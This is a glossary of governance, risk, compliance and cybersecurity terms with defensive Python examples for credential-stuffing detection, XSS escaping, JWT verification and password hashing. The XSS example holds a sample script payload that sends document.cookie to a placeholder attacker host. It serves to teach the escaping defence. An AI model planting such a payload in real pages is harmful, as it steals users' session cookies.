Cybersecurity Knowledge Hub
Concepts and Definitions.
GRC Terms in A
Access Control
Policies and procedures that restrict or manage access to certain information or systems within an organization.
Accountability
The expectation that individuals and organizations will be responsible for their actions and decisions.
Adherence
Conforming to or following established guidelines, policies, or regulations.
Agile Governance
Applying agile methodologies to the governance process, allowing for more flexibility and adaptability in responding to changing business environments.
Asset Management
The systematic process of developing, operating, maintaining, upgrading, and disposing of assets in a cost-effective manner.
Assessment
The process of evaluating risks and controls to determine the effectiveness of a company’s GRC practices.
Audit
An examination of processes, controls, and activities within an organization to ensure compliance with policies and regulations.
Cybersecurity Terms in A
Address Resolution Protocol Spoofing (ARP Spoofing)
An attack where the attacker sends falsified ARP messages over a local area network to link the attacker’s MAC address with the IP address of a legitimate computer or server.
Advanced Persistent Threat (APT)
A prolonged and targeted cyberattack in which an unauthorized user gains access to a network and remains undetected for an extended period.
Anonymization
The process of removing or modifying personally identifiable information from data to protect the privacy of individuals.
Application Programming Interface (API)
A set of rules that allows one software application to interact with another, often used for secure data sharing between applications.
Attack Surface
The sum of all points where an unauthorized user could try to enter or extract data from a system: exposed network services, APIs and interfaces, code paths that handle untrusted input, and the people who operate it. Reducing the attack surface (removing unused services, closing ports, limiting privileges) shrinks what an attacker can target.
Attack Vector
The path or means by which a hacker gains access to a computer system or network to deliver a malicious outcome.
Availability
Ensuring that systems and data are accessible and operational when needed, and protecting against disruptions.
GRC Terms in B
Backup and Recovery
The process of creating and maintaining copies of data to ensure its availability in the event of data loss, system failure or other disruptions.
Balanced Scorecard
A strategic performance management tool that measures an organization’s activities in terms of its vision and strategies, incorporating financial and non-financial performance indicators.
Best Practices
Established methods or techniques that are widely recognized as effective and efficient in achieving specific business objectives or compliance goals.
Bribery and Corruption Controls
Policies and measures implemented to prevent and detect bribery and corruption within an organization.
Business Continuity Planning (BCP)
The process of developing and implementing strategies to ensure a business can continue operating in the event of a disaster or cybersecurity incident.
Business Ethics
The principles and standards that guide ethical behavior in business, ensuring that organizations operate with integrity and accountability.
Business Impact Analysis (BIA)
An assessment of the potential impact of disruptions to business operations, helping organizations prioritize their recovery efforts.
Cybersecurity Terms in B
Backdoor
A hidden or unauthorized means of access to a computer system, typically used for malicious purposes.
Blue Team
Security professionals responsible for defending and maintaining the security of a system or network.
Botnet
A network of compromised computers (bots) that are controlled by a single entity (botmaster) for malicious activities.
Brute Force Attack
A type of attack where an attacker systematically tries all possible combinations of passwords or encryption keys until the correct one is found.
Browser Isolation
A security approach that executes web content in a separate environment to protect the local system from malicious code.
Bring Your Own Device (BYOD)
A policy allowing employees to use their personal devices for work, raising security concerns about data protection and network access.
Bug Bounty Program
A program that rewards individuals for finding and reporting software vulnerabilities to the organization.
GRC Terms in C
Capability Maturity Model Integration (CMMI)
A framework for improving and assessing an organization’s processes, including risk management and compliance practices.
Change Management
A systematic approach to dealing with changes within an organization, ensuring that changes are implemented smoothly with minimal disruption.
Cloud Governance
Policies and processes for managing and controlling the use of cloud services to ensure compliance and mitigate risks.
Compliance
Adhering to laws, regulations, policies, and standards relevant to an organization’s operations.
Conflict of Interest
A situation in which an individual or entity has competing interests that could compromise their objectivity, leading to potential risks.
Continuous Monitoring
The ongoing process of tracking, evaluating, and managing risks and compliance in real-time rather than through periodic assessments.
Control Framework
A structured approach to defining, implementing, and managing controls within an organization to ensure compliance and manage risks.
Control Self-Assessment (CSA)
A process in which individuals within an organization assess and evaluate the effectiveness of controls related to their own activities.
Crisis Communication
The strategic communication process to manage and respond to a crisis, involving both internal and external stakeholders.
Crisis Management
The process of preparing for, responding to, recovering from, and learning from events that pose a threat to an organization.
Cybersecurity Terms in C
CIA Triad
The CIA Triad is a fundamental concept in cybersecurity, representing three core principles: Confidentiality, Integrity, Availability. These principles guide the development of effective security measures and policies.
Cloud Security
Measures and strategies to protect data, applications, and infrastructure in cloud computing environments.
Compromise Assessment
An evaluation of an organization’s systems and networks to identify signs of a security breach or compromise.
Credential Stuffing
A cyberattack method where attackers use stolen username and password combinations to gain unauthorized access to multiple accounts.
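Brute force and credential stuffing look different in authentication logs: a brute-force source hammers one or two accounts with many failures, while a stuffing source tries many distinct accounts once or twice each and occasionally succeeds. The Python below is an added example, not part of the original glossary, that separates the two over a constructed log. The line format (`auth FAILED user=... src=...`) and the events are invented for the illustration; adapt the regular expression to the real log source.

```python
import re
from collections import defaultdict

# Constructed authentication log (not from any real system). Source addresses
# are taken from the RFC 5737 documentation ranges.
SAMPLE_AUTH_LOG = """\
2024-05-01T10:00:01Z auth FAILED user=alice src=203.0.113.5
2024-05-01T10:00:02Z auth FAILED user=alice src=203.0.113.5
2024-05-01T10:00:03Z auth FAILED user=alice src=203.0.113.5
2024-05-01T10:00:04Z auth FAILED user=alice src=203.0.113.5
2024-05-01T10:00:05Z auth FAILED user=alice src=203.0.113.5
2024-05-01T10:00:06Z auth FAILED user=alice src=203.0.113.5
2024-05-01T10:00:07Z auth FAILED user=bob src=198.51.100.7
2024-05-01T10:00:07Z auth FAILED user=carol src=198.51.100.7
2024-05-01T10:00:08Z auth FAILED user=dave src=198.51.100.7
2024-05-01T10:00:08Z auth OK user=erin src=198.51.100.7
2024-05-01T10:00:09Z auth FAILED user=frank src=198.51.100.7
2024-05-01T10:00:09Z auth FAILED user=grace src=198.51.100.7
2024-05-01T10:00:10Z auth FAILED user=bob src=192.0.2.9
2024-05-01T10:00:30Z auth OK user=bob src=192.0.2.9
"""

LINE_RE = re.compile(r"auth (?P<result>OK|FAILED) user=(?P<user>\S+) src=(?P<src>\S+)")


def aggregate_by_source(log_text):
    """Per source IP: failure count, set of targeted users, and the set of
    users that logged in successfully from that source."""
    per_src = defaultdict(lambda: {"failed": 0, "users": set(), "ok_users": set()})
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # skip lines that are not auth events instead of crashing
        stats = per_src[m["src"]]
        stats["users"].add(m["user"])
        if m["result"] == "FAILED":
            stats["failed"] += 1
        else:
            stats["ok_users"].add(m["user"])
    return per_src


def classify_sources(log_text, brute_threshold=5, stuffing_threshold=5):
    """Label each source IP.

    brute_force:         many failures concentrated on one or two accounts
    credential_stuffing: a try or two against many distinct accounts,
                         often with a few successes mixed in
    """
    verdicts = {}
    for src, s in aggregate_by_source(log_text).items():
        if len(s["users"]) >= stuffing_threshold:
            verdicts[src] = "credential_stuffing"
        elif s["failed"] >= brute_threshold and len(s["users"]) <= 2:
            verdicts[src] = "brute_force"
        else:
            verdicts[src] = "normal"
    return verdicts


def accounts_hit_by_stuffing(log_text, **thresholds):
    """Users who logged in successfully from a stuffing source: their
    credentials are confirmed reused and should be reset."""
    verdicts = classify_sources(log_text, **thresholds)
    hit = set()
    for src, s in aggregate_by_source(log_text).items():
        if verdicts[src] == "credential_stuffing":
            hit |= s["ok_users"]
    return hit
```

The thresholds are deliberately low for a small sample; in production they are tuned per application and evaluated over a sliding time window, and stuffing campaigns are usually spread across many source addresses, so the same aggregation is also run per user-agent or per ASN.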
Critical Infrastructure
Systems and assets vital to a country’s functioning, such as energy, transportation, and communication, which are often targeted by cyber threats.
Cryptography
The practice and study of techniques for securing communication and data by encoding information so that only authorized parties can understand it.
Cyber Hygiene
Best practices and habits to maintain a secure online environment, including regular updates, strong passwords, and safe browsing.
Cyber Resilience
The ability of an organization to prepare for, respond to, and recover from cybersecurity incidents, ensuring business continuity.
Cyber Threat Intelligence
Information collected, analyzed, and disseminated to understand and counter cybersecurity threats.
Cybersecurity
The practice of protecting computer systems, networks, and data from theft, damage, or unauthorized access.
Cybersecurity Framework
A set of guidelines, best practices, and standards to help organizations manage and improve their cybersecurity posture.
Cross-Site Scripting (XSS)
A type of security vulnerability where attackers inject malicious scripts into web pages viewed by other users.
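The vulnerability comes from concatenating untrusted input into markup; the fix is to encode the input for the context it lands in. The Python below is an added example, not code from the original glossary, that renders the same invented payload through a vulnerable template and a hardened one, and shows why attribute values need the quotes escaped as well.

```python
import html

# Constructed attacker-controlled input, as it might arrive in a query
# string or a stored comment. The domain is a placeholder.
PAYLOAD = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'


def render_comment_unsafe(comment):
    """Vulnerable: the comment is concatenated straight into the HTML, so a
    <script> element inside it runs in every viewer's browser."""
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment):
    """Hardened: the comment is HTML-encoded for element-content context, so
    < > & " ' reach the page as text, not markup."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_attribute_safe(value):
    """Attribute context: the value is quoted and the quote characters are
    encoded (quote=True), otherwise x" onmouseover="alert(1) would break out
    of the attribute and add an event handler."""
    return f'<input type="text" value="{html.escape(value, quote=True)}">'


def contains_script_tag(markup):
    """Crude check used to demonstrate the difference between the two renderers."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_comment_unsafe(PAYLOAD))
    print(render_comment_safe(PAYLOAD))
    print(render_attribute_safe('x" onmouseover="alert(1)'))
```

Encoding is context-specific: the HTML escaping shown here is wrong for data placed inside a JavaScript string, a URL, or a CSS value, each of which needs its own encoder. In practice the defense is a templating engine with auto-escaping on by default plus a Content Security Policy that blocks inline scripts, with manual escaping reserved for the rare spots where raw output is unavoidable.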
GRC Terms in D
Data Classification
The categorization of data based on its sensitivity, importance, and the level of protection required.
Data Governance
The management framework for ensuring high data quality, data management, data protection, and compliance with data-related regulations.
Delegation of Authority
The process of assigning decision-making authority to individuals or teams within an organization.
Disaster Recovery (DR)
The process and set of policies for recovering and restoring critical business operations after a disruptive event.
Documentation
The creation, management, and storage of records and information related to GRC processes to provide evidence of compliance and decision-making.
Document Management
The systematic control and organization of documents to ensure efficient retrieval, storage, and disposal.
Due Diligence
The process of thoroughly researching and assessing the potential risks and benefits associated with a business decision or transaction.
Cybersecurity Terms in D
Dark Web
A part of the internet that is intentionally hidden and inaccessible through standard web browsers, often associated with illegal activities.
Data Breach
Unauthorized access, disclosure, or acquisition of sensitive data.
Data Loss Prevention (DLP)
Strategies and tools to prevent unauthorized access, use, and transmission of sensitive data.
Digital Forensics
The process of collecting, analyzing, and preserving electronic evidence to investigate and respond to cybercrimes.
Distributed Denial of Service (DDoS)
An attack that overwhelms a system or network with a flood of traffic sent simultaneously from many compromised machines (typically a botnet), exhausting bandwidth or processing capacity so that legitimate users cannot reach the service. The distributed origin is what makes it hard to filter by blocking a single source.
Drive-By Download
Malicious software download that occurs without the user’s knowledge or consent when visiting a website.
Deep Packet Inspection (DPI)
A method of analyzing and filtering network traffic at the packet level to identify and respond to potential threats.
GRC Terms in E
E-discovery
The process of identifying, collecting, and producing electronic information in response to legal or regulatory requests.
Employee Training and Awareness
Programs and initiatives to educate employees about GRC policies, procedures, and ethical standards to ensure compliance.
Enterprise Architecture
The process of aligning an organization’s business processes, IT infrastructure, and information systems with its strategic objectives.
Enterprise Risk Management (ERM)
A comprehensive and integrated approach to managing all types of risks across an entire organization.
Environmental, Social, and Governance (ESG) Criteria
Criteria that measure a company’s performance in areas related to environmental sustainability, social responsibility, and corporate governance.
Escalation
The process of raising concerns or issues to higher levels of management or authority for resolution.
Event Management
The systematic process of identifying, assessing, prioritizing, and responding to events that could impact an organization’s objectives.
Exposure
The degree to which an organization is at risk of potential harm, loss, or negative impact.
External Audit
An independent examination of an organization’s financial statements, controls, and compliance with external standards by an external auditing firm.
Entity-Level Controls
Controls that operate at the organizational level and impact multiple business processes, ensuring overall compliance and risk management.
Cybersecurity Terms in E
Email Spoofing
The forgery of an email header to make the message appear as if it came from a trusted source.
End-to-End Encryption
A method of secure communication that prevents third-parties from accessing data while it’s transferred from one end system to another.
Endpoint Detection and Response (EDR)
A cybersecurity technology that continuously monitors and responds to advanced threats on endpoints.
Endpoint Security
Protection of the devices that connect to a network (laptops, desktops, servers, mobile devices) from malware and unauthorized access, typically through agents that enforce policy, patching, encryption, and monitoring on the device itself.
Ethical Hacking
Authorized and legal hacking activities performed by security professionals to identify vulnerabilities in a system.
Event Logging
The recording of events or activities in a system, often used for security monitoring and analysis.
Exploit
A piece of software or sequence of commands that takes advantage of a vulnerability to cause unintended behavior in software, hardware, or electronic systems.
Eavesdropping
Unauthorized interception of private communication, often through passive monitoring.
GRC Terms in F
Fault Tree Analysis
A method used to analyze and visualize the potential causes of a specific event or failure, often employed in risk management.
Financial Risk
Risks associated with financial activities, including market risk, credit risk, and liquidity risk.
Formal Controls
Explicitly defined policies, procedures, and guidelines established by an organization to ensure compliance and manage risks.
Forensic Audit
An examination of financial records and transactions with the goal of uncovering evidence for legal proceedings, often related to fraud or financial misconduct.
Fraud Detection
The use of technology, analytics, and monitoring to identify and prevent fraudulent activities within an organization.
Fraud Prevention
Strategies, controls, and measures put in place to detect and prevent fraudulent activities within an organization.
Functional Segregation of Duties (SoD)
The practice of dividing tasks and responsibilities among different individuals or teams to prevent conflicts of interest and reduce the risk of errors or fraud.
Cybersecurity Terms in F
File Integrity Monitoring (FIM)
Detecting unauthorized changes to critical files (system binaries, configuration files, application code) by comparing their current cryptographic hashes, permissions, and ownership against a trusted baseline and alerting on any difference.
Firewall
A network security device or software that monitors and controls incoming and outgoing network traffic based on predetermined security rules.
Forensics
The application of scientific methods to investigate cybercrimes.
Fuzzing
A testing technique that feeds a program large volumes of malformed, random, or mutated inputs and watches for crashes, hangs, or memory errors that indicate vulnerabilities.
Full Disk Encryption (FDE)
Encryption of an entire storage device for data protection.
GRC Terms in G
Gap Analysis
The process of assessing the difference between current practices and desired objectives, often used in compliance and risk management.
General Data Protection Regulation (GDPR)
European Union regulation designed to protect the privacy and personal data of individuals, requiring organizations to adhere to specific data protection standards.
Geopolitical Risk
Risks arising from political and economic instability, trade tensions, or other geopolitical factors that can affect global business operations.
Global Risk
Risks that have the potential to impact organizations on a global scale, such as economic downturns, geopolitical events, or pandemics.
Governance
The system of rules, practices, and processes by which an organization is directed and controlled to achieve its goals while addressing risks and ensuring compliance.
Governance, Risk, and Compliance (GRC)
An integrated approach to managing the three key components of organizational success: governance, risk management, and compliance.
Green IT Governance
Governance practices focused on environmentally sustainable and energy-efficient information technology operations.
GRC Software
Software solutions designed to streamline and automate governance, risk, and compliance processes within an organization.
Cybersecurity Terms in G
Gateway
A device or software that connects different networks and serves as an entry point for data traffic.
Gray Hat Hacker
An individual who hacks without authorization but without the malicious intent of a black hat, for example finding vulnerabilities in systems they have no permission to test and then reporting them to the owner.
GRC Terms in H
Harmonization
The process of aligning and standardizing policies, processes, and controls across different departments or business units to achieve consistency and efficiency.
Heat Map
A visual representation of data where values are depicted by color, often used in risk management to highlight areas of concern or priority.
Holistic Risk Management
An integrated and comprehensive approach to managing risks across an entire organization, considering various factors and interdependencies.
Hybrid Cloud Governance
Policies and controls for managing and securing data and applications in a hybrid cloud environment, which combines on-premises infrastructure with cloud services.
Cybersecurity Terms in H
Hardening
The process of securing a computer system by reducing its vulnerabilities and limiting potential attack surfaces.
Hashing
Converting input data of any size into a fixed-length digest with a one-way function, so that the original cannot be recovered from the digest and any change to the input yields a different digest. Used for integrity verification and, combined with a salt and a deliberately slow algorithm, for password storage.
Hypertext Transfer Protocol Secure (HTTPS)
A secure version of HTTP that encrypts data transmitted between a user’s browser and a website, often used for secure online transactions.
GRC Terms in I
Incident Management
The process of identifying, managing, and resolving security incidents, ensuring a rapid response to minimize the impact of security breaches.
Information Governance
The management framework for controlling and protecting information assets, ensuring their accuracy, integrity, and availability.
Information Security Policy
A formal, management-approved statement of the rules and responsibilities that govern how an organization protects the confidentiality, integrity, and availability of its information assets, from which more specific standards and procedures are derived.
Internal Audit
An independent, objective assurance and consulting activity designed to add value and improve an organization’s operations by evaluating and improving the effectiveness of risk management, control, and governance processes.
Internal Control
Policies, procedures, and practices implemented by an organization to ensure the reliability of financial reporting, compliance with laws, and safeguarding of assets.
ISO 31000
An international standard providing guidelines for risk management, outlining principles, framework, and a process for managing risk effectively.
IT Governance
The framework and practices for aligning IT strategy with business objectives, ensuring the effective use of IT resources and managing associated risks.
IT Risk
Risks associated with the use of information technology, including cybersecurity threats, data breaches, and system failures.
Cybersecurity Terms in I
Incident Response
The process of managing and mitigating the impact of a cybersecurity incident or breach.
Insider Threat
The risk posed to an organization’s security by individuals within the organization, such as employees, contractors, or business partners.
Integrity
Ensuring the accuracy and reliability of information, systems, and data.
Internet of Things Security (IoT Security)
Measures to protect internet-connected devices from cybersecurity threats.
IP Address Spoofing (IP Spoofing)
A technique where an attacker sends IP packets from a false (or « spoofed ») source address to deceive the
Identity and Access Management (IAM)
Policies, processes, and technologies that manage digital identities and control access to resources.
Indicators of Compromise (IoC)
Artifacts or behaviors that suggest a system has been compromised or under attack.
Information Security
The practice of protecting information from unauthorized access, disclosure, disruption, modification, or destruction.
Intelligence-Led Security
A proactive approach to cybersecurity that uses threat intelligence to inform decision-making and defense strategies.
Intrusion Detection System (IDS)
A security technology that monitors network traffic or host activity for signs of unauthorized access or malicious behavior and raises alerts. Unlike an intrusion prevention system (IPS), an IDS detects and reports but does not itself block traffic.
ISO 27001
An international standard for information security management systems, providing a framework for organizations to manage and secure their information assets.
IT Security
The protection of information technology systems and data from unauthorized access, attacks, or damage.
GRC Terms in J
Job Rotation
A practice where employees are moved between different roles within an organization to prevent fraud, increase cross-functional knowledge, and mitigate risk.
Joint Audit
An audit conducted by multiple parties, such as internal and external auditors or auditors from different business units, to assess and ensure compliance with governance and regulatory requirements.
Cybersecurity Terms in J
Jamming Attack
A cyber attack technique where the attacker disrupts or disables communication by transmitting interference signals.
JavaScript Security
Measures and practices to secure JavaScript code from vulnerabilities and malicious exploitation.
JSON Web Token (JWT)
A compact, URL-safe means of representing claims between two parties, commonly used for authentication and authorization.
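A JWT is three base64url segments (header, claims, signature) joined by dots; the security of the scheme rests entirely on the verifier checking the signature against an algorithm it chose, not one the token names. The Python below is an added example, not part of the original glossary, that signs and verifies HS256 tokens with the standard library and rejects the three classic failures: a tampered payload, an `alg: none` header, and an expired token. The secret and claims are invented for the illustration.

```python
import base64
import hashlib
import hmac
import json
import time


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


class JWTError(Exception):
    pass


def jwt_sign_hs256(claims: dict, secret: bytes) -> str:
    """Produce header.claims.signature with an HMAC-SHA256 signature."""
    header = {"alg": "HS256", "typ": "JWT"}
    segments = [
        _b64url_encode(json.dumps(header, separators=(",", ":")).encode()),
        _b64url_encode(json.dumps(claims, separators=(",", ":")).encode()),
    ]
    sig = hmac.new(secret, ".".join(segments).encode("ascii"), hashlib.sha256).digest()
    return ".".join(segments + [_b64url_encode(sig)])


def jwt_verify_hs256(token: str, secret: bytes, now=None) -> dict:
    """Verify the signature, the pinned algorithm and the expiry, then return the claims.

    The header's alg is compared with what this verifier expects, never used to
    pick the verification routine; that is what defeats 'alg: none' and the
    RS256-to-HS256 key-confusion attack."""
    try:
        h_b64, c_b64, s_b64 = token.split(".")
    except ValueError:
        raise JWTError("malformed token")
    header = json.loads(_b64url_decode(h_b64))
    if header.get("alg") != "HS256":
        raise JWTError(f"unexpected alg {header.get('alg')!r}")
    expected = hmac.new(secret, f"{h_b64}.{c_b64}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(s_b64)):
        raise JWTError("bad signature")
    claims = json.loads(_b64url_decode(c_b64))
    now = time.time() if now is None else now
    if "exp" in claims and now >= claims["exp"]:
        raise JWTError("token expired")
    return claims


def verify_outcome(token: str, secret: bytes, now=None) -> str:
    """Convenience wrapper: 'ok' or the rejection reason."""
    try:
        jwt_verify_hs256(token, secret, now=now)
        return "ok"
    except JWTError as e:
        return str(e)
```

In production use a maintained library and pass it an explicit allow-list of algorithms; the point of the hand-rolled verifier above is to show what that allow-list protects against, and why the signature check must be constant-time (`hmac.compare_digest`) and must happen before any claim is trusted.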
GRC Terms in K
Key Risk Indicator (KRI)
A measurable metric used to assess and monitor a specific risk within an organization’s risk management framework.
Key Control Indicator (KCI)
A metric used to evaluate and measure the effectiveness of controls in managing risks.
Key Performance Indicator (KPI)
A measurable value used to assess the performance and effectiveness of an organization in achieving its goals and objectives in the context of GRC.
Key Risk Profile (KRP)
A summary of an organization’s key risks, including their potential impact, likelihood, and mitigation strategies.
Kickback
An unethical practice where a person or entity receives illegal payments or rewards in return for providing favorable treatment or business opportunities.
Knowledge Management
The process of capturing, organizing, and utilizing an organization’s knowledge and expertise to improve decision-making, collaboration, and risk management.
KYC (Know Your Customer)
A compliance process carried out by financial institutions to verify the identity of customers and assess the potential risks associated with their activities.
Cybersecurity Terms in K
Kerberos
A network authentication protocol that uses tickets to allow nodes communicating over a non-secure network to prove their identity.
Kernel
The core part of an operating system that oversees the communication between hardware and software components, including security-related operations.
Keylogger
Malicious software or hardware that records keystrokes on a computer or device, often used to capture sensitive information like passwords.
Keystroke Dynamics
A biometric authentication technique that analyzes the behavioral patterns of an individual’s keystrokes to verify their identity.
Key Exchange (KE)
A cryptographic process by which two parties establish a shared secret key over an insecure channel without ever transmitting the key itself (for example, Diffie-Hellman), so that the key can then protect their subsequent communication.
Key Management
The process of generating, storing, handling, and protecting cryptographic keys used in encryption and decryption processes.
Knowledge-Based Authentication (KBA)
An authentication method that verifies a user’s identity by asking questions based on personal information known to the user, such as their mother’s maiden name or the name of their first pet. Considered weak on its own, because the answers are often guessable or discoverable in public records, social media, and breached data.
GRC Terms in L
Legal Compliance
Adherence to laws and regulations relevant to an organization’s operations, products, and services.
Legal Risk
The potential for legal actions, lawsuits, or regulatory actions that could negatively impact an organization.
Legacy System
An outdated or older computer system, software application, or technology infrastructure that is still in use within an organization.
Leveraged Risk
The additional risk introduced by using financial instruments or debt to fund business activities.
Limitation of Liability
Provisions in contracts or agreements that specify the maximum amount of liability one party may have in case of a breach or dispute.
Likelihood
The probability or chance of a risk event occurring, often assessed in qualitative or quantitative terms.
Line of Defense
The layers or functions within an organization responsible for managing and mitigating risks. Typically categorized as the first (operational management), second (risk management and compliance), and third (internal audit) lines of defense.
Logical Access Controls
Policies and procedures that restrict access to computer systems and data based on user roles, responsibilities, and authorization levels.
Loss Control
Measures and strategies implemented to prevent or reduce the impact of losses, including financial losses and reputational damage.
Loss Event
An incident or occurrence that results in financial or non-financial losses for an organization.
Loss Mitigation
Strategies and actions taken to minimize or prevent potential losses, particularly in the context of risk management.
Cybersecurity Terms in L
Least Privilege
The principle of providing individuals or systems with only the minimum levels of access or permissions needed to perform their job functions.
Lightweight Directory Access Protocol (LDAP)
A protocol used to access and manage directory information services, often used for user authentication.
Local Area Network (LAN)
A network that is limited to a small geographic area, such as a single building or campus.
Load Balancer
A device or software that distributes network traffic across multiple servers to ensure no single server is overwhelmed.
Lockscreen Ransomware
Malware that locks a user out of their device and demands payment to unlock it.
Log Management
The process of collecting, storing, and analyzing log data from computer systems to identify and respond to security incidents.
GRC Terms in M
Mandate
The authority or permission granted to an individual or entity to perform specific tasks or make decisions within an organization.
Mitigation
The process of reducing the severity or impact of a risk through preventive or corrective actions.
Mobile Device Management (MDM)
Policies and technologies used to secure and manage mobile devices within an organization, ensuring compliance and data security.
Model Risk
The risk of financial loss resulting from the use of models or statistical techniques that are incorrect or misapplied.
Monitoring
The ongoing observation and surveillance of processes, controls, and activities to ensure compliance and identify emerging risks.
Cybersecurity Terms in M
Malware
Malicious software designed to harm or exploit computer systems or networks, including viruses, worms, Trojans, and ransomware.
Man-in-the-Middle Attack (MitM)
An attack where an attacker intercepts and potentially alters communication between two parties without their knowledge.
GRC Terms in N
Need-to-Know Principle
A security principle that restricts access to sensitive information to only those individuals who require it for their job responsibilities.
Non-Compliance
Failure to adhere to laws, regulations, policies, or standards relevant to an organization’s operations.
Non-Disclosure Agreement (NDA)
A legal contract that outlines confidential information that parties share with each other and restricts its use.
Non-Discretionary Access Control
Access control policies and mechanisms that are determined by an organization’s policies and cannot be changed by individual users.
Notification of Breach
The process of informing relevant parties about a security breach or data breach, typically required by data protection regulations.
Cybersecurity Terms in N
National Institute of Standards and Technology (NIST)
A U.S. government agency that develops and promotes cybersecurity standards and best practices.
Network Access Control (NAC)
A security approach that enforces policies to control access to a network, ensuring only authorized devices can connect.
Network Address Translation (NAT)
A technique that modifies network address information in packet headers while in transit, typically to map private IP addresses to a public IP address.
Network Forensics
The process of capturing, recording, and analyzing network events to identify security incidents.
Network Security
Measures and strategies to protect computer networks from unauthorized access, attacks, or data breaches.
Next-Generation Firewall (NGFW)
A firewall that integrates additional features beyond traditional firewall capabilities, such as intrusion prevention systems (IPS) and application-layer filtering.
Non-Repudiation
A security property that prevents an individual or entity from denying the validity of their actions or commitments.
GRC Terms in O
Objective
Clear and specific goals or outcomes that an organization aims to achieve within a defined timeframe.
Operational Risk
The risk of loss resulting from inadequate or failed internal processes, systems, people, or external events.
Outsourcing
The practice of contracting out certain business functions or processes to external service providers.
Oversight
The supervision, monitoring, and review of activities and processes to ensure they align with organizational goals and comply with relevant standards.
Ownership
The assignment of responsibility for a specific task, process, or control to an individual or team within an organization.
Cybersecurity Terms in O
Open Authorization (OAuth)
An open standard for access delegation, commonly used for granting third-party applications limited access to a user’s resources.
Open Source
Software with a source code that is made available to the public, allowing anyone to view, modify, and distribute it.
Open Web Application Security Project (OWASP)
An online community that produces freely available security-related resources for web application developers.
GRC Terms in P
Policy
A set of principles, guidelines, or rules established by an organization to govern its operations and decision-making.
Policy Management
The systematic process of developing, implementing, and monitoring organizational policies to ensure compliance.
Preventive Controls
Measures and mechanisms designed to proactively avoid or minimize the occurrence of risks and issues.
Privacy Impact Assessment (PIA)
An assessment that identifies and evaluates the potential privacy risks and impacts of a project, system, or process.
Process
A series of structured activities or steps designed to achieve a specific outcome or goal within an organization.
Process Mapping
The visual representation of a business process, illustrating its steps, inputs, outputs, and relationships.
Program Governance
The set of practices and processes for overseeing and managing an organization’s programs, ensuring alignment with strategic objectives.
Cybersecurity Terms in P
Packet Sniffing
The practice of intercepting and examining network traffic, often to capture sensitive information.
Password Hash
A one-way cryptographic digest of a password, stored in place of the password itself so that a database compromise does not directly expose user credentials. Each password should be hashed with its own random salt and a deliberately slow algorithm (bcrypt, scrypt, Argon2, or PBKDF2) to make offline cracking expensive.
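The difference between the general Hashing entry above and a password hash is the salt and the deliberately slow function. The Python below is an added example, not part of the original glossary, that illustrates both entries: a plain SHA-256 digest (deterministic, fast, fine for integrity checks) beside a salted PBKDF2-HMAC-SHA256 password hash with a constant-time verifier. The storage format (`pbkdf2_sha256$iterations$salt$digest`) is a convention chosen for this example, and the passwords are invented.

```python
import hashlib
import hmac
import os

# OWASP-recommended minimum iteration count for PBKDF2-HMAC-SHA256 (2023 guidance).
ITERATIONS = 600_000


def plain_sha256(data: str) -> str:
    """A fast, unsalted hash: good for verifying that a file or message is
    unchanged, unsuitable for passwords because equal inputs give equal digests
    and GPUs compute billions of these per second."""
    return hashlib.sha256(data.encode()).hexdigest()


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Return 'pbkdf2_sha256$iterations$salt_hex$digest_hex'.

    A fresh 16-byte random salt per password means two users with the same
    password get different records and precomputed tables are useless."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute the digest with the stored salt and compare in constant time."""
    try:
        scheme, iterations, salt_hex, digest_hex = stored.split("$")
        if scheme != "pbkdf2_sha256":
            return False
        candidate = hashlib.pbkdf2_hmac(
            "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
        )
    except ValueError:
        return False  # malformed record: refuse rather than crash
    # compare_digest avoids leaking how many leading bytes matched via timing
    return hmac.compare_digest(candidate.hex(), digest_hex)


if __name__ == "__main__":
    print(plain_sha256("hunter2"), plain_sha256("hunter2"))  # identical digests
    record = hash_password("hunter2")
    print(record)
    print(verify_password("hunter2", record), verify_password("hunter3", record))
```

Storing the iteration count in the record is what lets you raise it later: old records keep verifying, and each successful login is the moment to re-hash with the current parameters. Argon2id or bcrypt are preferable where a library is available; PBKDF2 is used here only because it ships with the standard library.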
Patch Management
The process of planning, testing, and applying patches or updates to software and systems to address vulnerabilities and improve security.
Penetration Testing
A simulated cyberattack on a computer system, network, or web application to identify security vulnerabilities.
Phishing
A type of social engineering attack where attackers attempt to trick individuals into providing sensitive information.
Physical Security
Measures to protect physical assets, facilities, and information from unauthorized access or damage.
Proxy Server
An intermediate server that acts as a gateway between a user’s device and the internet, providing security and anonymity.
GRC Terms in Q
Quality Control
Procedures, measures, and processes implemented to ensure that products, services, or operations meet specified quality standards.
Quality Management System (QMS)
A set of policies, processes, and procedures for planning and executing an organization’s core business processes with a focus on meeting customer expectations and regulatory requirements.
Cybersecurity Terms in Q
Quarantine
Isolating or restricting access to a system, network, or device that is suspected of being compromised to prevent further harm.
Quick Response Code (QR Code)
A two-dimensional barcode that can store various types of data, often used for quick access to information or links.
Quantum Computing
A type of computing that uses the principles of quantum mechanics. A sufficiently large quantum computer could break the public-key algorithms in wide use today (RSA, Diffie-Hellman, and elliptic-curve cryptography), which is driving the migration to post-quantum algorithms.
GRC Terms in R
RACI Matrix
A matrix that defines and clarifies the roles and responsibilities for each task or activity within a project or business process (Responsible, Accountable, Consulted, Informed).
Residual Risk
The level of risk that remains after risk mitigation measures have been applied.
Risk
The uncertainty of an event occurring that could have an impact on achieving objectives. Risk is often assessed in terms of likelihood and potential consequences.
Risk Appetite
The level of risk that an organization is willing to accept or tolerate to achieve its objectives.
Risk Assessment
The process of identifying, analyzing, and evaluating risks to understand their potential impact on an organization.
Risk Control
Measures and actions taken to manage and mitigate identified risks within an organization.
Risk Culture
